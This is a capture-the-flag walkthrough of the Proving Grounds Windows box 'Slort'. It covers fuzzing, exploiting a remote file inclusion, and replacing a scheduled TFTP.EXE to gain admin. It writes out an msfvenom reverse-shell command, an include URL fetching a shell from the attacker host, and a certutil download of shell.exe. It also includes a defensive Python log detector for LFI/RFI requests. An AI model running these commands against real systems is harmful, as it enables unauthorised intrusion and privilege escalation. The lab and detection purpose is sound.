Slort

Source: Proving Grounds OS: Windows Community Rating: Intermediate

Enumeration & Reconnaissance

  • I started as usual with autorecon which exposed: FTP (21), 135, 139, 445, 3306, HTTP (4443), 5040, HTTP (8080), 49664 -> 49669

Service Analysis

  • FTP had no anonymous access so I started with the usual, HTTP. Both HTTP sites were XAMPP's default page. Access to phpMyAdmin was denied, displaying the message:

XAMPP Default Page
Access Forbidden
  • I checked the fuzzers but they exposed nothing, and neither SMB nor MySQL provided anything useful. I kept going in circles for a bit until I fuzzed the sites again with a different wordlist:

ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-small.txt:FUZZ -u http://192.168.213.53:4443/FUZZ
  • That's when "/site/" was exposed. This directory contained a simple PHP page with the URL: http://192.168.213.53:4443/site/index.php?page=main.php I'm sure if I were in an anime, a light bulb would have appeared with the text "File Inclusion" flashing before my eyes.

site Directory

Gaining Initial Access

  • I tested the inclusion by visiting: http://192.168.213.53:4443/site/index.php?page=..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\System32\drivers\etc\hosts which worked!

LFI Check
  • When facing a file inclusion vulnerability, it's important to check whether it's Remote File Inclusion (RFI) or only Local File Inclusion. Turns out we have RFI and that was it, we were able to get a shell!

  • I generated a reverse shell payload with msfvenom:

msfvenom -p windows/x64/shell_reverse_tcp -f exe -o shell.exe LHOST=192.168.45.170 LPORT=8178
  • Then triggered it via the vulnerable parameter: http://192.168.213.53:4443/site/index.php?page=http://192.168.45.170:901/shell.php

Reverse Shell
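
As an added example that is not part of the original writeup, here is a small Python detector a defender could run over XAMPP/Apache access logs to spot the two request shapes used above: traversal sequences in the page parameter (LFI) and a page value pointing at an external URL or stream wrapper (RFI). The log lines are constructed, the parameter name page is taken from the URL in the writeup, and the Combined Log Format layout is an assumption.

```python
import re
from urllib.parse import parse_qs, unquote

# Constructed sample lines in Apache "combined" format (not taken from the original writeup).
SAMPLE_LOG = r"""
192.168.45.170 - - [10/Mar/2024:10:01:02 +0000] "GET /site/index.php?page=main.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.168.45.170 - - [10/Mar/2024:10:01:09 +0000] "GET /site/index.php?page=..\..\..\..\Windows\System32\drivers\etc\hosts HTTP/1.1" 200 824 "-" "Mozilla/5.0"
192.168.45.170 - - [10/Mar/2024:10:01:15 +0000] "GET /site/index.php?page=%2e%2e%2f%2e%2e%2fWindows%2fwin.ini HTTP/1.1" 200 300 "-" "Mozilla/5.0"
192.168.45.170 - - [10/Mar/2024:10:02:30 +0000] "GET /site/index.php?page=http://192.168.45.170:901/shell.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
192.168.45.170 - - [10/Mar/2024:10:03:00 +0000] "GET /dashboard/ HTTP/1.1" 200 7400 "-" "Mozilla/5.0"
"""

# Combined Log Format: client, ident, user, [timestamp], "METHOD target PROTO", status, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
TRAVERSAL = re.compile(r'\.\./|\.\.\\')              # ../ or ..\ (Windows-style, as in the writeup)
REMOTE = re.compile(r'^[a-z][a-z0-9+.-]*://', re.I)  # http://, ftp://, php:// stream wrappers ...
WATCHED_PARAMS = {"page"}  # the include parameter from the writeup; extend for other apps

def classify_query(query):
    """Return (param, kind, decoded_value) findings for one URL query string."""
    findings = []
    for name, values in parse_qs(query, keep_blank_values=True).items():
        if name not in WATCHED_PARAMS:
            continue
        for raw in values:
            value = unquote(raw)  # parse_qs decoded once; unwrap a second encoding layer too
            if REMOTE.match(value):
                findings.append((name, "rfi", value))
            elif TRAVERSAL.search(value):
                findings.append((name, "lfi", value))
    return findings

def scan_log(text):
    """Parse access-log lines and return alerts as (client_ip, kind, path, value) tuples."""
    alerts = []
    for line in text.strip().splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        path, _, query = m.group("target").partition("?")
        for _param, kind, value in classify_query(query):
            alerts.append((m.group("ip"), kind, path, value))
    return alerts
```

Calling scan_log(SAMPLE_LOG) returns three alerts: two lfi hits for the traversal requests (including the URL-encoded one) and one rfi hit for the external URL, while requests without a watched parameter produce nothing.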

Privilege Escalation

  • Once I was in, I uploaded winPEAS and started checking around. The C drive had a Backup directory, and inside I found a file, info.txt, containing:

info.txt Content
  • This indicated a scheduled service (the Windows equivalent of cron jobs). I decided to see if I had permission over the directory. I performed the following steps:

move TFTP.EXE TFTP_old.EXE
certutil -urlcache -split -f http://192.168.45.170:901/shell.exe
move shell.exe TFTP.EXE
  • There we go, we got a shell back as an admin.

Privilege Escalation

Lessons Learned

  • Fuzzing with alternative wordlists can reveal hidden directories when initial scans turn up nothing.

  • File inclusion vulnerabilities can sometimes allow Remote File Inclusion, granting a quick path to a shell.

  • Scheduled tasks or services that run binaries from writable directories are valuable privilege escalation vectors.
